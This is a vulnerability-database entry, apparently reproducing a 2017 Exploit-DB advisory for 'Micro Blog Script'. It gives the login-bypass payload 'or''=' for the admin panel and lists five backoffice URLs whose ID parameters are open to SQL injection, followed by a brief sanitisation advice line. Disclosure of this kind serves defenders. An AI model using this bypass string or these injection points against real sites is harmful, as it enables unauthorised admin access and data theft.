header-logo
Suggest Exploit
vendor:
Micro Blog Script
by:
Ihsan Sencan
7,5
CVSS
HIGH
Authentication Bypass & SQL Injection
89
CWE
Product Name: Micro Blog Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2017

Authentication Bypass & SQL Injection

Authentication Bypass: An attacker can bypass authentication by setting the Username and Password to 'or''=' and hitting enter. SQL Injection/Exploit: An attacker can exploit the vulnerability by injecting malicious SQL code into the following URLs: http://localhost/[PATH]/backoffice/security.php?act=edit_cat&id=[SQL], http://localhost/[PATH]/backoffice/blog_category.php?act=edit_cat&blog_category_id=[SQL], http://localhost/[PATH]/backoffice/photo.php?act=edit_cat&photo_id=[SQL], http://localhost/[PATH]/backoffice/video.php?act=edit_cat&video_id=[SQL], http://localhost/[PATH]/backoffice/banner_list.php?act=edit_cat&banner_id=[SQL], etc.

Mitigation:

Developers should ensure that all user input is properly sanitized and validated before being used in any SQL queries.
Source

Exploit-DB raw data:

# # # # # 
# Vulnerability: SQL Injection + Authentication Bypass
# Date: 18.01.2017
# Vendor Homepage: http://www.scriptgiant.com/
# Tested on: http://www.microblogscript.scriptgiant.in
# Script Name: Micro Blog Script
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Authentication Bypass :
# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
# SQL Injection/Exploit :
# http://localhost/[PATH]/backoffice/security.php?act=edit_cat&id=[SQL]
# http://localhost/[PATH]/backoffice/blog_category.php?act=edit_cat&blog_category_id=[SQL]
# http://localhost/[PATH]/backoffice/photo.php?act=edit_cat&photo_id=[SQL]
# http://localhost/[PATH]/backoffice/video.php?act=edit_cat&video_id=[SQL]
# http://localhost/[PATH]/backoffice/banner_list.php?act=edit_cat&banner_id=[SQL]
# E.t.c.... Other files, too. SQL There are security vulnerabilities.
# # # # #